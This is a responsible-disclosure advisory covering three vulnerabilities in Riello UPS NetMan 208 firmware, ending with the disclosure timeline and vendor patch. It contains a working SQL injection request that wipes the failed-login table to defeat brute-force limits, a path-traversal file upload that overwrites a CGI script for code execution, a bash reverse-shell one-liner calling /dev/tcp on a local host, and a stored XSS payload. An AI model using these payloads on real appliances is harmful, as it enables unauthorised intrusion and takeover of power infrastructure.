During a client engagement, we identified the presence of a Riello UPS appliance within the target environment.
Without prior knowledge of its internal architecture or credentials, we conducted a series of black-box tests to assess potential exposure and evaluate the appliance’s resilience against unauthorized access and common attack vectors. Then, we downloaded the firmware from the vendor’s website to conduct further tests. The analysis led to the identification of some vulnerabilities which may allow an attacker to exploit specific weaknesses in the appliance’s security mechanisms that would like to disclosure following the responsible disclosure process.
In the following section, we present the test environment we set up and the technical details of the vulnerabilities we found.
In order to validate the finding in a controlled and reproducible manner, we performed a secondary assessment on the software executed on the appliance, deployed on a dedicated virtualized environment. This allowed us to confirm the issue independently of the production environment and rule out any context-specific variables.
Specifically, a docker container was prepared with NetMan application, obtained extracting the downloaded image from Riello UPS Netman 208. The base image used is the latest Ubuntu and the JDK installed was the zulu11.80.21-ca-jdk11.0.27. The NetMan software was executed as root user.
With this setup we can suppose that the Riello UPS with NetMan 208 vulnerable version are:
| component | version |
|---|---|
| NetMan 208 Operating System: | Version 1.5 |
| NetMan 208 Application: | Version 1.11 |
| NetMan 208 JVM: | Version 1.0 |
A SQL Injection exists in Riello UPS with NetMan 208 due to improper validation of user supplied input in username field in /cgi-bin/login.cgi. This makes it possible for unauthenticated attackers to make stacked queries in LOGINFAILEDTABLE table to bypass brute-force protection in "standard" login (e.g. no LDAP).
Exploiting a SQL Injection in the login workflow we were able to delete the LOGINFAILEDTABLE table content allowing to avoid the rate limit protection against brute-force attack. The following is the HTTP request used in the proof-of-concept:
POST /cgi-bin/login.cgi HTTP/1.1
Host: <virtual-host>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 94
Connection: keep-alive
logintype=standard&username=admin';DELETE FROM LOGINFAILEDTABLE WHERE 1=1; -- &password=bbbbbb
Detailed description Trying to login several times with wrong credentials, the application locks the account providing the user the message "Please wait before try again".
The analysis highlighted that the username parameter is vulnerable to SQL Injection. It is possible to exploit it with stacked queries to delete all entries in the LOGINFAILEDTABLE table with the payload ’;DELETE FROM LOGINFAILEDTABLE WHERE 1=1; -- . With the admin user, for example, the request payload can be:
logintype=standard&username=admin’;DELETE FROM LOGINFAILEDTABLE WHERE 1=1; --&password=try
As it is possible to see in the following evidence, the first response is again "Please wait before try again" but the database is now empty.
By trying to login again with a valid username the check on the user lock does not apply allowing the user to make the attempt. The request with the SQL Injection payload and the normal login can be alternated to avoid brute-force protection. It is also possible to automate this attack by adding the SQL Injection to empty the table after some attempts (for example 3) to bypass the brute-force protection.
An arbitrary file upload exists in Riello UPS with NetMan 208, specifically in /cgi-bin/certsupload.cgi. This vulnerability allows authenticated attackers to achieve remote code execution by uploading malicious files.
Exploiting an arbitrary file upload on the certificate upload feature as an admin user, it’s possible to overwrite existing resources on the server file system. An attacker can overwrite an existing CGI file that will be executed as soon as the script is accessed. Detailed description
When an admin user uploads a certificate file, the web application appears to utilize the raw, user-provided filename to save it locally on the file system. This is vulnerable to path traversal and arbitrary file write and allows an attacker to overwrite files within the file system by specifying the full path as the filename.
In this scenario, we were able to modify the contents of the /cgi-bin/runin.cgi file to execute the following arbitrary commands:
echo “execution code”
echo “$id”As you can see in the following screenshot:
Calling /cgi-bin/runin.cgi it execute the payload:
In a real scenario a potential attacker could execute more complex commands, such as a bash reverse shell which gets executed upon calling the file. This could lead to a complete compromise of the system leading to a remote code execution.
So, as proof of concept, we try to write the following reverse shell code:
bash -i >& /dev/tcp/172.17.0.1/4444 0>&1 &As per the following screenshot:
And we gain a remote shell on NetMan 208:
A Stored Cross-Site Scripting (XSS) vulnerability has been identified in Riello UPS with NetMan 208 due to improper validation of user supplied input in /cgi-bin/loginbanner_w.cgi. An authenticated attacker can inject malicious script into pre/post login banner title and message that will be executed when viewed by anyone going to the home page.
The login banner functionality allows you to inject JavaScript payload into the banners; the payload will be executed by the user that accesses the page with the embedded banners (for example on the login page).
Detailed description
Authenticated administrative users can modify the various banners, such as the pre-login banner, and post-login banner. During the edit no input sanitization mechanism was identified. Since no limitation on the HTML tags has been detected it’s also possible to embed any tag. If an administrator changes the banner to include JavaScript code enclosed in the <script> tag, then it’s executed in the victim browser.
For example, if you modify the pre_login_banner_title POST field in /cgi-bin/loginbanner_w.cgi with a basic Cross-Site Scripting payload like this one:
<script>alert('xss')</script>As you can see in following request:
The script is executed by the browser of who visit the Rello UPS NetMan 208 login page.
Other vulnerable fields in this request are: pre_login_banner_message, pre_login_banner_message, post_login_admin_banner_title, post_login_admin_banner_message, post_login_power_banner_title, post_login_power_banner_message, post_login_view_banner_title, post_login_view_banner_message.
Please note that even if this issue is exploitable as admin user, the session cookie has no HttpOnly flag set and the XSS could be used to obtain other users (viewer/power) cookies.
We’ve decided to follow the industry standard 90+30 days responsible disclosure process; here’s the timeline:
- November 11, 2025: Sent initial report to Riello’s security team ([email protected]) with full technical details and PoC exploits. All compiled according to their Vulnerability Disclosure Policy.
- November 14, 2025: Riello confirms they’ve succesfully replicate the vulnerabilities and sets the timeline for the remediation patch to three-four weeks.
- December 23, 2025: Riello publish a new APP release (1.12) available on Driver & Download page.